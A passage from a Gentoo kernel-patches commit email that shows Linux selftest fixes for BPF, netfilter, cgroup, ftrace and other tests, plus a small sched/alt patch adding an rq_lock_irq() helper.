+ 	int err, xdp_prog_fd, tc_prog_fd, ifindex_src, ifindex_dst;
+ 	char data[sizeof(pkt_udp) + sizeof(__u32)];
+diff --git a/tools/testing/selftests/bpf/prog_tests/xdp_synproxy.c b/tools/testing/selftests/bpf/prog_tests/xdp_synproxy.c
+index 75550a40e029d..879f5da2f21e6 100644
+--- a/tools/testing/selftests/bpf/prog_tests/xdp_synproxy.c
++++ b/tools/testing/selftests/bpf/prog_tests/xdp_synproxy.c
+@@ -174,7 +174,7 @@ out:
+ 	system("ip netns del synproxy");
+ }
+ 
+-void test_xdp_synproxy(void)
++void serial_test_xdp_synproxy(void)
+ {
+ 	if (test__start_subtest("xdp"))
+ 		test_synproxy(true);
+diff --git a/tools/testing/selftests/bpf/progs/bpf_iter_ksym.c b/tools/testing/selftests/bpf/progs/bpf_iter_ksym.c
+index 285c008cbf9c2..9ba14c37bbcc9 100644
+--- a/tools/testing/selftests/bpf/progs/bpf_iter_ksym.c
++++ b/tools/testing/selftests/bpf/progs/bpf_iter_ksym.c
+@@ -7,14 +7,14 @@ char _license[] SEC("license") = "GPL";
+ 
+ unsigned long last_sym_value = 0;
+ 
+-static inline char tolower(char c)
++static inline char to_lower(char c)
+ {
+ 	if (c >= 'A' && c <= 'Z')
+ 		c += ('a' - 'A');
+ 	return c;
+ }
+ 
+-static inline char toupper(char c)
++static inline char to_upper(char c)
+ {
+ 	if (c >= 'a' && c <= 'z')
+ 		c -= ('a' - 'A');
+@@ -54,7 +54,7 @@ int dump_ksym(struct bpf_iter__ksym *ctx)
+ 	type = iter->type;
+ 
+ 	if (iter->module_name[0]) {
+-		type = iter->exported ? toupper(type) : tolower(type);
++		type = iter->exported ? to_upper(type) : to_lower(type);
+ 		BPF_SEQ_PRINTF(seq, "0x%llx %c %s [ %s ] ",
+ 			       value, type, iter->name, iter->module_name);
+ 	} else {
+diff --git a/tools/testing/selftests/bpf/progs/empty_skb.c b/tools/testing/selftests/bpf/progs/empty_skb.c
+new file mode 100644
+index 0000000000000..4b0cd67532511
+--- /dev/null
++++ b/tools/testing/selftests/bpf/progs/empty_skb.c
+@@ -0,0 +1,37 @@
++// SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause
++#include <linux/bpf.h>
++#include <bpf/bpf_helpers.h>
++#include <bpf/bpf_endian.h>
++
++char _license[] SEC("license") = "GPL";
++
++int ifindex;
++int ret;
++
++SEC("lwt_xmit")
++int redirect_ingress(struct __sk_buff *skb)
++{
++	ret = bpf_clone_redirect(skb, ifindex, BPF_F_INGRESS);
++	return 0;
++}
++
++SEC("lwt_xmit")
++int redirect_egress(struct __sk_buff *skb)
++{
++	ret = bpf_clone_redirect(skb, ifindex, 0);
++	return 0;
++}
++
++SEC("tc")
++int tc_redirect_ingress(struct __sk_buff *skb)
++{
++	ret = bpf_clone_redirect(skb, ifindex, BPF_F_INGRESS);
++	return 0;
++}
++
++SEC("tc")
++int tc_redirect_egress(struct __sk_buff *skb)
++{
++	ret = bpf_clone_redirect(skb, ifindex, 0);
++	return 0;
++}
+diff --git a/tools/testing/selftests/bpf/progs/lsm_cgroup.c b/tools/testing/selftests/bpf/progs/lsm_cgroup.c
+index 4f2d60b87b75d..02c11d16b692a 100644
+--- a/tools/testing/selftests/bpf/progs/lsm_cgroup.c
++++ b/tools/testing/selftests/bpf/progs/lsm_cgroup.c
+@@ -7,6 +7,10 @@
+ 
+ char _license[] SEC("license") = "GPL";
+ 
++extern bool CONFIG_SECURITY_SELINUX __kconfig __weak;
++extern bool CONFIG_SECURITY_SMACK __kconfig __weak;
++extern bool CONFIG_SECURITY_APPARMOR __kconfig __weak;
++
+ #ifndef AF_PACKET
+ #define AF_PACKET 17
+ #endif
+@@ -140,6 +144,10 @@ SEC("lsm_cgroup/sk_alloc_security")
+ int BPF_PROG(socket_alloc, struct sock *sk, int family, gfp_t priority)
+ {
+ 	called_socket_alloc++;
++	/* if already have non-bpf lsms installed, EPERM will cause memory leak of non-bpf lsms */
++	if (CONFIG_SECURITY_SELINUX || CONFIG_SECURITY_SMACK || CONFIG_SECURITY_APPARMOR)
++		return 1;
++
+ 	if (family == AF_UNIX)
+ 		return 0; /* EPERM */
+ 
+diff --git a/tools/testing/selftests/bpf/test_bpftool_metadata.sh b/tools/testing/selftests/bpf/test_bpftool_metadata.sh
+index 1bf81b49457af..b5520692f41bd 100755
+--- a/tools/testing/selftests/bpf/test_bpftool_metadata.sh
++++ b/tools/testing/selftests/bpf/test_bpftool_metadata.sh
+@@ -4,6 +4,9 @@
+ # Kselftest framework requirement - SKIP code is 4.
+ ksft_skip=4
+ 
++BPF_FILE_USED="metadata_used.bpf.o"
++BPF_FILE_UNUSED="metadata_unused.bpf.o"
++
+ TESTNAME=bpftool_metadata
+ BPF_FS=$(awk '$3 == "bpf" {print $2; exit}' /proc/mounts)
+ BPF_DIR=$BPF_FS/test_$TESTNAME
+@@ -55,7 +58,7 @@ mkdir $BPF_DIR
+ 
+ trap cleanup EXIT
+ 
+-bpftool prog load metadata_unused.o $BPF_DIR/unused
++bpftool prog load $BPF_FILE_UNUSED $BPF_DIR/unused
+ 
+ METADATA_PLAIN="$(bpftool prog)"
+ echo "$METADATA_PLAIN" | grep 'a = "foo"' > /dev/null
+@@ -67,7 +70,7 @@ bpftool map | grep 'metadata.rodata' > /dev/null
+ 
+ rm $BPF_DIR/unused
+ 
+-bpftool prog load metadata_used.o $BPF_DIR/used
++bpftool prog load $BPF_FILE_USED $BPF_DIR/used
+ 
+ METADATA_PLAIN="$(bpftool prog)"
+ echo "$METADATA_PLAIN" | grep 'a = "bar"' > /dev/null
+diff --git a/tools/testing/selftests/bpf/test_flow_dissector.sh b/tools/testing/selftests/bpf/test_flow_dissector.sh
+index 5303ce0c977bd..4b298863797a2 100755
+--- a/tools/testing/selftests/bpf/test_flow_dissector.sh
++++ b/tools/testing/selftests/bpf/test_flow_dissector.sh
+@@ -2,6 +2,8 @@
+ # SPDX-License-Identifier: GPL-2.0
+ #
+ # Load BPF flow dissector and verify it correctly dissects traffic
++
++BPF_FILE="bpf_flow.bpf.o"
+ export TESTNAME=test_flow_dissector
+ unmount=0
+ 
+@@ -22,7 +24,7 @@ if [[ -z $(ip netns identify $$) ]]; then
+ 	if bpftool="$(which bpftool)"; then
+ 		echo "Testing global flow dissector..."
+ 
+-		$bpftool prog loadall ./bpf_flow.o /sys/fs/bpf/flow \
++		$bpftool prog loadall $BPF_FILE /sys/fs/bpf/flow \
+ 			type flow_dissector
+ 
+ 		if ! unshare --net $bpftool prog attach pinned \
+@@ -95,7 +97,7 @@ else
+ fi
+ 
+ # Attach BPF program
+-./flow_dissector_load -p bpf_flow.o -s _dissect
++./flow_dissector_load -p $BPF_FILE -s _dissect
+ 
+ # Setup
+ tc qdisc add dev lo ingress
+diff --git a/tools/testing/selftests/bpf/test_lwt_ip_encap.sh b/tools/testing/selftests/bpf/test_lwt_ip_encap.sh
+index 6c69c42b1d607..1e565f47aca94 100755
+--- a/tools/testing/selftests/bpf/test_lwt_ip_encap.sh
++++ b/tools/testing/selftests/bpf/test_lwt_ip_encap.sh
+@@ -38,6 +38,7 @@
+ #       ping: SRC->[encap at veth2:ingress]->GRE:decap->DST
+ #       ping replies go DST->SRC directly
+ 
++BPF_FILE="test_lwt_ip_encap.bpf.o"
+ if [[ $EUID -ne 0 ]]; then
+ 	echo "This script must be run as root"
+ 	echo "FAIL"
+@@ -373,14 +374,14 @@ test_egress()
+ 	# install replacement routes (LWT/eBPF), pings succeed
+ 	if [ "${ENCAP}" == "IPv4" ] ; then
+ 		ip -netns ${NS1} route add ${IPv4_DST} encap bpf xmit obj \
+-			test_lwt_ip_encap.o sec encap_gre dev veth1 ${VRF}
++			${BPF_FILE} sec encap_gre dev veth1 ${VRF}
+ 		ip -netns ${NS1} -6 route add ${IPv6_DST} encap bpf xmit obj \
+-			test_lwt_ip_encap.o sec encap_gre dev veth1 ${VRF}
++			${BPF_FILE} sec encap_gre dev veth1 ${VRF}
+ 	elif [ "${ENCAP}" == "IPv6" ] ; then
+ 		ip -netns ${NS1} route add ${IPv4_DST} encap bpf xmit obj \
+-			test_lwt_ip_encap.o sec encap_gre6 dev veth1 ${VRF}
++			${BPF_FILE} sec encap_gre6 dev veth1 ${VRF}
+ 		ip -netns ${NS1} -6 route add ${IPv6_DST} encap bpf xmit obj \
+-			test_lwt_ip_encap.o sec encap_gre6 dev veth1 ${VRF}
++			${BPF_FILE} sec encap_gre6 dev veth1 ${VRF}
+ 	else
+ 		echo "    unknown encap ${ENCAP}"
+ 		TEST_STATUS=1
+@@ -431,14 +432,14 @@ test_ingress()
+ 	# install replacement routes (LWT/eBPF), pings succeed
+ 	if [ "${ENCAP}" == "IPv4" ] ; then
+ 		ip -netns ${NS2} route add ${IPv4_DST} encap bpf in obj \
+-			test_lwt_ip_encap.o sec encap_gre dev veth2 ${VRF}
++			${BPF_FILE} sec encap_gre dev veth2 ${VRF}
+ 		ip -netns ${NS2} -6 route add ${IPv6_DST} encap bpf in obj \
+-			test_lwt_ip_encap.o sec encap_gre dev veth2 ${VRF}
++			${BPF_FILE} sec encap_gre dev veth2 ${VRF}
+ 	elif [ "${ENCAP}" == "IPv6" ] ; then
+ 		ip -netns ${NS2} route add ${IPv4_DST} encap bpf in obj \
+-			test_lwt_ip_encap.o sec encap_gre6 dev veth2 ${VRF}
++			${BPF_FILE} sec encap_gre6 dev veth2 ${VRF}
+ 		ip -netns ${NS2} -6 route add ${IPv6_DST} encap bpf in obj \
+-			test_lwt_ip_encap.o sec encap_gre6 dev veth2 ${VRF}
++			${BPF_FILE} sec encap_gre6 dev veth2 ${VRF}
+ 	else
+ 		echo "FAIL: unknown encap ${ENCAP}"
+ 		TEST_STATUS=1
+diff --git a/tools/testing/selftests/bpf/test_lwt_seg6local.sh b/tools/testing/selftests/bpf/test_lwt_seg6local.sh
+index 826f4423ce029..0efea2292d6aa 100755
+--- a/tools/testing/selftests/bpf/test_lwt_seg6local.sh
++++ b/tools/testing/selftests/bpf/test_lwt_seg6local.sh
+@@ -23,6 +23,7 @@
+ 
+ # Kselftest framework requirement - SKIP code is 4.
+ ksft_skip=4
++BPF_FILE="test_lwt_seg6local.bpf.o"
+ readonly NS1="ns1-$(mktemp -u XXXXXX)"
+ readonly NS2="ns2-$(mktemp -u XXXXXX)"
+ readonly NS3="ns3-$(mktemp -u XXXXXX)"
+@@ -117,18 +118,18 @@ ip netns exec ${NS6} ip -6 addr add fb00::109/16 dev veth10 scope link
+ ip netns exec ${NS1} ip -6 addr add fb00::1/16 dev lo
+ ip netns exec ${NS1} ip -6 route add fb00::6 dev veth1 via fb00::21
+ 
+-ip netns exec ${NS2} ip -6 route add fb00::6 encap bpf in obj test_lwt_seg6local.o sec encap_srh dev veth2
++ip netns exec ${NS2} ip -6 route add fb00::6 encap bpf in obj ${BPF_FILE} sec encap_srh dev veth2
+ ip netns exec ${NS2} ip -6 route add fd00::1 dev veth3 via fb00::43 scope link
+ 
+ ip netns exec ${NS3} ip -6 route add fc42::1 dev veth5 via fb00::65
+-ip netns exec ${NS3} ip -6 route add fd00::1 encap seg6local action End.BPF endpoint obj test_lwt_seg6local.o sec add_egr_x dev veth4
++ip netns exec ${NS3} ip -6 route add fd00::1 encap seg6local action End.BPF endpoint obj ${BPF_FILE} sec add_egr_x dev veth4
+ 
+-ip netns exec ${NS4} ip -6 route add fd00::2 encap seg6local action End.BPF endpoint obj test_lwt_seg6local.o sec pop_egr dev veth6
++ip netns exec ${NS4} ip -6 route add fd00::2 encap seg6local action End.BPF endpoint obj ${BPF_FILE} sec pop_egr dev veth6
+ ip netns exec ${NS4} ip -6 addr add fc42::1 dev lo
+ ip netns exec ${NS4} ip -6 route add fd00::3 dev veth7 via fb00::87
+ 
+ ip netns exec ${NS5} ip -6 route add fd00::4 table 117 dev veth9 via fb00::109
+-ip netns exec ${NS5} ip -6 route add fd00::3 encap seg6local action End.BPF endpoint obj test_lwt_seg6local.o sec inspect_t dev veth8
++ip netns exec ${NS5} ip -6 route add fd00::3 encap seg6local action End.BPF endpoint obj ${BPF_FILE} sec inspect_t dev veth8
+ 
+ ip netns exec ${NS6} ip -6 addr add fb00::6/16 dev lo
+ ip netns exec ${NS6} ip -6 addr add fd00::4/16 dev lo
+diff --git a/tools/testing/selftests/bpf/test_tc_edt.sh b/tools/testing/selftests/bpf/test_tc_edt.sh
+index daa7d1b8d3092..76f0bd17061f9 100755
+--- a/tools/testing/selftests/bpf/test_tc_edt.sh
++++ b/tools/testing/selftests/bpf/test_tc_edt.sh
+@@ -5,6 +5,7 @@
+ # with dst port = 9000 down to 5MBps. Then it measures actual
+ # throughput of the flow.
+ 
++BPF_FILE="test_tc_edt.bpf.o"
+ if [[ $EUID -ne 0 ]]; then
+ 	echo "This script must be run as root"
+ 	echo "FAIL"
+@@ -54,7 +55,7 @@ ip -netns ${NS_DST} route add ${IP_SRC}/32  dev veth_dst
+ ip netns exec ${NS_SRC} tc qdisc add dev veth_src root fq
+ ip netns exec ${NS_SRC} tc qdisc add dev veth_src clsact
+ ip netns exec ${NS_SRC} tc filter add dev veth_src egress \
+-	bpf da obj test_tc_edt.o sec cls_test
++	bpf da obj ${BPF_FILE} sec cls_test
+ 
+ 
+ # start the listener
+diff --git a/tools/testing/selftests/bpf/test_tc_tunnel.sh b/tools/testing/selftests/bpf/test_tc_tunnel.sh
+index 088fcad138c98..334bdfeab9403 100755
+--- a/tools/testing/selftests/bpf/test_tc_tunnel.sh
++++ b/tools/testing/selftests/bpf/test_tc_tunnel.sh
+@@ -3,6 +3,7 @@
+ #
+ # In-place tunneling
+ 
++BPF_FILE="test_tc_tunnel.bpf.o"
+ # must match the port that the bpf program filters on
+ readonly port=8000
+ 
+@@ -196,7 +197,7 @@ verify_data
+ # client can no longer connect
+ ip netns exec "${ns1}" tc qdisc add dev veth1 clsact
+ ip netns exec "${ns1}" tc filter add dev veth1 egress \
+-	bpf direct-action object-file ./test_tc_tunnel.o \
++	bpf direct-action object-file ${BPF_FILE} \
+ 	section "encap_${tuntype}_${mac}"
+ echo "test bpf encap without decap (expect failure)"
+ server_listen
+@@ -296,7 +297,7 @@ fi
+ ip netns exec "${ns2}" ip link del dev testtun0
+ ip netns exec "${ns2}" tc qdisc add dev veth2 clsact
+ ip netns exec "${ns2}" tc filter add dev veth2 ingress \
+-	bpf direct-action object-file ./test_tc_tunnel.o section decap
++	bpf direct-action object-file ${BPF_FILE} section decap
+ echo "test bpf encap with bpf decap"
+ client_connect
+ verify_data
+diff --git a/tools/testing/selftests/bpf/test_tunnel.sh b/tools/testing/selftests/bpf/test_tunnel.sh
+index e9ebc67d73f70..2eaedc1d9ed30 100755
+--- a/tools/testing/selftests/bpf/test_tunnel.sh
++++ b/tools/testing/selftests/bpf/test_tunnel.sh
+@@ -45,6 +45,7 @@
+ # 5) Tunnel protocol handler, ex: vxlan_rcv, decap the packet
+ # 6) Forward the packet to the overlay tnl dev
+ 
++BPF_FILE="test_tunnel_kern.bpf.o"
+ BPF_PIN_TUNNEL_DIR="/sys/fs/bpf/tc/tunnel"
+ PING_ARG="-c 3 -w 10 -q"
+ ret=0
+@@ -545,7 +546,7 @@ test_xfrm_tunnel()
+ 	> /sys/kernel/debug/tracing/trace
+ 	setup_xfrm_tunnel
+ 	mkdir -p ${BPF_PIN_TUNNEL_DIR}
+-	bpftool prog loadall ./test_tunnel_kern.o ${BPF_PIN_TUNNEL_DIR}
++	bpftool prog loadall ${BPF_FILE} ${BPF_PIN_TUNNEL_DIR}
+ 	tc qdisc add dev veth1 clsact
+ 	tc filter add dev veth1 proto ip ingress bpf da object-pinned \
+ 		${BPF_PIN_TUNNEL_DIR}/xfrm_get_state
+@@ -572,7 +573,7 @@ attach_bpf()
+ 	SET=$2
+ 	GET=$3
+ 	mkdir -p ${BPF_PIN_TUNNEL_DIR}
+-	bpftool prog loadall ./test_tunnel_kern.o ${BPF_PIN_TUNNEL_DIR}/
++	bpftool prog loadall ${BPF_FILE} ${BPF_PIN_TUNNEL_DIR}/
+ 	tc qdisc add dev $DEV clsact
+ 	tc filter add dev $DEV egress bpf da object-pinned ${BPF_PIN_TUNNEL_DIR}/$SET
+ 	tc filter add dev $DEV ingress bpf da object-pinned ${BPF_PIN_TUNNEL_DIR}/$GET
+diff --git a/tools/testing/selftests/bpf/test_xdp_meta.sh b/tools/testing/selftests/bpf/test_xdp_meta.sh
+index ea69370caae30..2740322c1878b 100755
+--- a/tools/testing/selftests/bpf/test_xdp_meta.sh
++++ b/tools/testing/selftests/bpf/test_xdp_meta.sh
+@@ -1,5 +1,6 @@
+ #!/bin/sh
+ 
++BPF_FILE="test_xdp_meta.bpf.o"
+ # Kselftest framework requirement - SKIP code is 4.
+ readonly KSFT_SKIP=4
+ readonly NS1="ns1-$(mktemp -u XXXXXX)"
+@@ -42,11 +43,11 @@ ip netns exec ${NS2} ip addr add 10.1.1.22/24 dev veth2
+ ip netns exec ${NS1} tc qdisc add dev veth1 clsact
+ ip netns exec ${NS2} tc qdisc add dev veth2 clsact
+ 
+-ip netns exec ${NS1} tc filter add dev veth1 ingress bpf da obj test_xdp_meta.o sec t
+-ip netns exec ${NS2} tc filter add dev veth2 ingress bpf da obj test_xdp_meta.o sec t
++ip netns exec ${NS1} tc filter add dev veth1 ingress bpf da obj ${BPF_FILE} sec t
++ip netns exec ${NS2} tc filter add dev veth2 ingress bpf da obj ${BPF_FILE} sec t
+ 
+-ip netns exec ${NS1} ip link set dev veth1 xdp obj test_xdp_meta.o sec x
+-ip netns exec ${NS2} ip link set dev veth2 xdp obj test_xdp_meta.o sec x
++ip netns exec ${NS1} ip link set dev veth1 xdp obj ${BPF_FILE} sec x
++ip netns exec ${NS2} ip link set dev veth2 xdp obj ${BPF_FILE} sec x
+ 
+ ip netns exec ${NS1} ip link set dev veth1 up
+ ip netns exec ${NS2} ip link set dev veth2 up
+diff --git a/tools/testing/selftests/bpf/test_xdp_vlan.sh b/tools/testing/selftests/bpf/test_xdp_vlan.sh
+index 810c407e0286e..fbcaa9f0120b2 100755
+--- a/tools/testing/selftests/bpf/test_xdp_vlan.sh
++++ b/tools/testing/selftests/bpf/test_xdp_vlan.sh
+@@ -200,11 +200,11 @@ ip netns exec ${NS2} sh -c 'ping -W 1 -c 1 100.64.41.1 || echo "Success: First p
+ # ----------------------------------------------------------------------
+ # In ns1: ingress use XDP to remove VLAN tags
+ export DEVNS1=veth1
+-export FILE=test_xdp_vlan.o
++export BPF_FILE=test_xdp_vlan.bpf.o
+ 
+ # First test: Remove VLAN by setting VLAN ID 0, using "xdp_vlan_change"
+ export XDP_PROG=xdp_vlan_change
+-ip netns exec ${NS1} ip link set $DEVNS1 $XDP_MODE object $FILE section $XDP_PROG
++ip netns exec ${NS1} ip link set $DEVNS1 $XDP_MODE object $BPF_FILE section $XDP_PROG
+ 
+ # In ns1: egress use TC to add back VLAN tag 4011
+ #  (del cmd)
+@@ -212,7 +212,7 @@ ip netns exec ${NS1} ip link set $DEVNS1 $XDP_MODE object $FILE section $XDP_PRO
+ #
+ ip netns exec ${NS1} tc qdisc add dev $DEVNS1 clsact
+ ip netns exec ${NS1} tc filter add dev $DEVNS1 egress \
+-  prio 1 handle 1 bpf da obj $FILE sec tc_vlan_push
++  prio 1 handle 1 bpf da obj $BPF_FILE sec tc_vlan_push
+ 
+ # Now the namespaces can reach each-other, test with ping:
+ ip netns exec ${NS2} ping -i 0.2 -W 2 -c 2 $IPADDR1
+@@ -226,7 +226,7 @@ ip netns exec ${NS1} ping -i 0.2 -W 2 -c 2 $IPADDR2
+ #
+ export XDP_PROG=xdp_vlan_remove_outer2
+ ip netns exec ${NS1} ip link set $DEVNS1 $XDP_MODE off
+-ip netns exec ${NS1} ip link set $DEVNS1 $XDP_MODE object $FILE section $XDP_PROG
++ip netns exec ${NS1} ip link set $DEVNS1 $XDP_MODE object $BPF_FILE section $XDP_PROG
+ 
+ # Now the namespaces should still be able reach each-other, test with ping:
+ ip netns exec ${NS2} ping -i 0.2 -W 2 -c 2 $IPADDR1
+diff --git a/tools/testing/selftests/bpf/xdp_synproxy.c b/tools/testing/selftests/bpf/xdp_synproxy.c
+index ff35320d2be97..410a1385a01dd 100644
+--- a/tools/testing/selftests/bpf/xdp_synproxy.c
++++ b/tools/testing/selftests/bpf/xdp_synproxy.c
+@@ -104,7 +104,8 @@ static void parse_options(int argc, char *argv[], unsigned int *ifindex, __u32 *
+ 		{ "tc", no_argument, NULL, 'c' },
+ 		{ NULL, 0, NULL, 0 },
+ 	};
+-	unsigned long mss4, mss6, wscale, ttl;
++	unsigned long mss4, wscale, ttl;
++	unsigned long long mss6;
+ 	unsigned int tcpipopts_mask = 0;
+ 
+ 	if (argc < 2)
+@@ -286,7 +287,7 @@ static int syncookie_open_bpf_maps(__u32 prog_id, int *values_map_fd, int *ports
+ 
+ 	prog_info = (struct bpf_prog_info) {
+ 		.nr_map_ids = 8,
+-		.map_ids = (__u64)map_ids,
++		.map_ids = (__u64)(unsigned long)map_ids,
+ 	};
+ 	info_len = sizeof(prog_info);
+ 
+diff --git a/tools/testing/selftests/cgroup/cgroup_util.c b/tools/testing/selftests/cgroup/cgroup_util.c
+index 4c52cc6f2f9cc..e8bbbdb77e0d5 100644
+--- a/tools/testing/selftests/cgroup/cgroup_util.c
++++ b/tools/testing/selftests/cgroup/cgroup_util.c
+@@ -555,6 +555,7 @@ int proc_mount_contains(const char *option)
+ ssize_t proc_read_text(int pid, bool thread, const char *item, char *buf, size_t size)
+ {
+ 	char path[PATH_MAX];
++	ssize_t ret;
+ 
+ 	if (!pid)
+ 		snprintf(path, sizeof(path), "/proc/%s/%s",
+@@ -562,8 +563,8 @@ ssize_t proc_read_text(int pid, bool thread, const char *item, char *buf, size_t
+ 	else
+ 		snprintf(path, sizeof(path), "/proc/%d/%s", pid, item);
+ 
+-	size = read_text(path, buf, size);
+-	return size < 0 ? -1 : size;
++	ret = read_text(path, buf, size);
++	return ret < 0 ? -1 : ret;
+ }
+ 
+ int proc_read_strstr(int pid, bool thread, const char *item, const char *needle)
+diff --git a/tools/testing/selftests/drivers/net/netdevsim/devlink.sh b/tools/testing/selftests/drivers/net/netdevsim/devlink.sh
+index 9de1d123f4f5d..a08c02abde121 100755
+--- a/tools/testing/selftests/drivers/net/netdevsim/devlink.sh
++++ b/tools/testing/selftests/drivers/net/netdevsim/devlink.sh
+@@ -496,8 +496,8 @@ dummy_reporter_test()
+ 
+ 	check_reporter_info dummy healthy 3 3 10 true
+ 
+-	echo 8192> $DEBUGFS_DIR/health/binary_len
+-	check_fail $? "Failed set dummy reporter binary len to 8192"
++	echo 8192 > $DEBUGFS_DIR/health/binary_len
++	check_err $? "Failed set dummy reporter binary len to 8192"
+ 
+ 	local dump=$(devlink health dump show $DL_HANDLE reporter dummy -j)
+ 	check_err $? "Failed show dump of dummy reporter"
+diff --git a/tools/testing/selftests/efivarfs/efivarfs.sh b/tools/testing/selftests/efivarfs/efivarfs.sh
+index a90f394f9aa90..d374878cc0ba9 100755
+--- a/tools/testing/selftests/efivarfs/efivarfs.sh
++++ b/tools/testing/selftests/efivarfs/efivarfs.sh
+@@ -87,6 +87,11 @@ test_create_read()
+ {
+ 	local file=$efivarfs_mount/$FUNCNAME-$test_guid
+ 	./create-read $file
++	if [ $? -ne 0 ]; then
++		echo "create and read $file failed"
++		file_cleanup $file
++		exit 1
++	fi
+ 	file_cleanup $file
+ }
+ 
+diff --git a/tools/testing/selftests/ftrace/test.d/ftrace/func_event_triggers.tc b/tools/testing/selftests/ftrace/test.d/ftrace/func_event_triggers.tc
+index 8d26d5505808b..3eea2abf68f9e 100644
+--- a/tools/testing/selftests/ftrace/test.d/ftrace/func_event_triggers.tc
++++ b/tools/testing/selftests/ftrace/test.d/ftrace/func_event_triggers.tc
+@@ -38,11 +38,18 @@ cnt_trace() {
+ 
+ test_event_enabled() {
+     val=$1
++    check_times=10		# wait for 10 * SLEEP_TIME at most
+ 
+-    e=`cat $EVENT_ENABLE`
+-    if [ "$e" != $val ]; then
+-	fail "Expected $val but found $e"
+-    fi
++    while [ $check_times -ne 0 ]; do
++	e=`cat $EVENT_ENABLE`
++	if [ "$e" == $val ]; then
++	    return 0
++	fi
++	sleep $SLEEP_TIME
++	check_times=$((check_times - 1))
++    done
++
++    fail "Expected $val but found $e"
+ }
+ 
+ run_enable_disable() {
+diff --git a/tools/testing/selftests/netfilter/conntrack_icmp_related.sh b/tools/testing/selftests/netfilter/conntrack_icmp_related.sh
+index b48e1833bc896..76645aaf2b58f 100755
+--- a/tools/testing/selftests/netfilter/conntrack_icmp_related.sh
++++ b/tools/testing/selftests/netfilter/conntrack_icmp_related.sh
+@@ -35,6 +35,8 @@ cleanup() {
+ 	for i in 1 2;do ip netns del nsrouter$i;done
+ }
+ 
++trap cleanup EXIT
++
+ ipv4() {
+     echo -n 192.168.$1.2
+ }
+@@ -146,11 +148,17 @@ ip netns exec nsclient1 nft -f - <<EOF
+ table inet filter {
+ 	counter unknown { }
+ 	counter related { }
++	counter redir4 { }
++	counter redir6 { }
+ 	chain input {
+ 		type filter hook input priority 0; policy accept;
+-		meta l4proto { icmp, icmpv6 } ct state established,untracked accept
+ 
++		icmp type "redirect" ct state "related" counter name "redir4" accept
++		icmpv6 type "nd-redirect" ct state "related" counter name "redir6" accept
++
++		meta l4proto { icmp, icmpv6 } ct state established,untracked accept
+ 		meta l4proto { icmp, icmpv6 } ct state "related" counter name "related" accept
++
+ 		counter name "unknown" drop
+ 	}
+ }
+@@ -279,5 +287,29 @@ else
+ 	echo "ERROR: icmp error RELATED state test has failed"
+ fi
+ 
+-cleanup
++# add 'bad' route,  expect icmp REDIRECT to be generated
++ip netns exec nsclient1 ip route add 192.168.1.42 via 192.168.1.1
++ip netns exec nsclient1 ip route add dead:1::42 via dead:1::1
++
++ip netns exec "nsclient1" ping -q -c 2 192.168.1.42 > /dev/null
++
++expect="packets 1 bytes 112"
++check_counter nsclient1 "redir4" "$expect"
++if [ $? -ne 0 ];then
++	ret=1
++fi
++
++ip netns exec "nsclient1" ping -c 1 dead:1::42 > /dev/null
++expect="packets 1 bytes 192"
++check_counter nsclient1 "redir6" "$expect"
++if [ $? -ne 0 ];then
++	ret=1
++fi
++
++if [ $ret -eq 0 ];then
++	echo "PASS: icmp redirects had RELATED state"
++else
++	echo "ERROR: icmp redirect RELATED state test has failed"
++fi
++
+ exit $ret
+diff --git a/tools/testing/selftests/powerpc/dscr/dscr_sysfs_test.c b/tools/testing/selftests/powerpc/dscr/dscr_sysfs_test.c
+index fbbdffdb2e5d2..f20d1c166d1e4 100644
+--- a/tools/testing/selftests/powerpc/dscr/dscr_sysfs_test.c
++++ b/tools/testing/selftests/powerpc/dscr/dscr_sysfs_test.c
+@@ -24,6 +24,7 @@ static int check_cpu_dscr_default(char *file, unsigned long val)
+ 	rc = read(fd, buf, sizeof(buf));
+ 	if (rc == -1) {
+ 		perror("read() failed");
++		close(fd);
+ 		return 1;
+ 	}
+ 	close(fd);
+@@ -65,8 +66,10 @@ static int check_all_cpu_dscr_defaults(unsigned long val)
+ 		if (access(file, F_OK))
+ 			continue;
+ 
+-		if (check_cpu_dscr_default(file, val))
++		if (check_cpu_dscr_default(file, val)) {
++			closedir(sysfs);
+ 			return 1;
++		}
+ 	}
+ 	closedir(sysfs);
+ 	return 0;
+diff --git a/tools/testing/selftests/proc/proc-uptime-002.c b/tools/testing/selftests/proc/proc-uptime-002.c
+index e7ceabed7f51f..7d0aa22bdc12b 100644
+--- a/tools/testing/selftests/proc/proc-uptime-002.c
++++ b/tools/testing/selftests/proc/proc-uptime-002.c
+@@ -17,6 +17,7 @@
+ // while shifting across CPUs.
+ #undef NDEBUG
+ #include <assert.h>
++#include <errno.h>
+ #include <unistd.h>
+ #include <sys/syscall.h>
+ #include <stdlib.h>
+@@ -54,7 +55,7 @@ int main(void)
+ 		len += sizeof(unsigned long);
+ 		free(m);
+ 		m = malloc(len);
+-	} while (sys_sched_getaffinity(0, len, m) == -EINVAL);
++	} while (sys_sched_getaffinity(0, len, m) == -1 && errno == EINVAL);
+ 
+ 	fd = open("/proc/uptime", O_RDONLY);
+ 	assert(fd >= 0);

diff --git a/5021_sched-alt-missing-rq-lock-irq-function.patch b/5021_sched-alt-missing-rq-lock-irq-function.patch
new file mode 100644
index 00000000..04cca612
--- /dev/null
+++ b/5021_sched-alt-missing-rq-lock-irq-function.patch
@@ -0,0 +1,30 @@
+From 4157360d2e1cbdfb8065f151dbe057b17188a23f Mon Sep 17 00:00:00 2001
+From: Tor Vic <torvic9@mailbox.org>
+Date: Mon, 7 Nov 2022 15:11:54 +0100
+Subject: [PATCH] sched/alt: Add missing rq_lock_irq() function to header file
+
+---
+ kernel/sched/alt_sched.h | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/kernel/sched/alt_sched.h b/kernel/sched/alt_sched.h
+index 93ff3bddd36f..a00bc84b93b2 100644
+--- a/kernel/sched/alt_sched.h
++++ b/kernel/sched/alt_sched.h
+@@ -387,6 +387,13 @@ task_rq_unlock(struct rq *rq, struct task_struct *p, struct rq_flags *rf)
+ 	raw_spin_unlock_irqrestore(&p->pi_lock, rf->flags);
+ }
+ 
++static inline void
++rq_lock_irq(struct rq *rq, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	raw_spin_lock_irq(&rq->lock);
++}
++
+ static inline void
+ rq_lock(struct rq *rq, struct rq_flags *rf)
+ 	__acquires(rq->lock)
+-- 
+GitLab
+


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2022-12-21 19:05 Alice Ferrazzi
